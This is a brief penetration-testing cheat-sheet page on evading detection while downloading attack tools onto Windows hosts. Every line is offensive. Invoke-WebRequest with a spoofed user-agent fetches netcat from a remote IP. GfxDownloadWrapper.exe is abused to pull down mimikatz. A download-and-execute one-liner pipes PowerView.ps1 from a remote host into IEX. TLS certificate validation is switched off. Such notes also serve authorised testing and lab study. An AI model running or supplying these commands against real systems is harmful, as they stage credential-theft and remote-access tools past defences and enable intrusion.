githubEdit

bypass-evasion

Evade Detection (user-agent)

Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Bypass methods

NotSupportedException error

Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

SSL/TLS error

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Re-run the command again

Last updated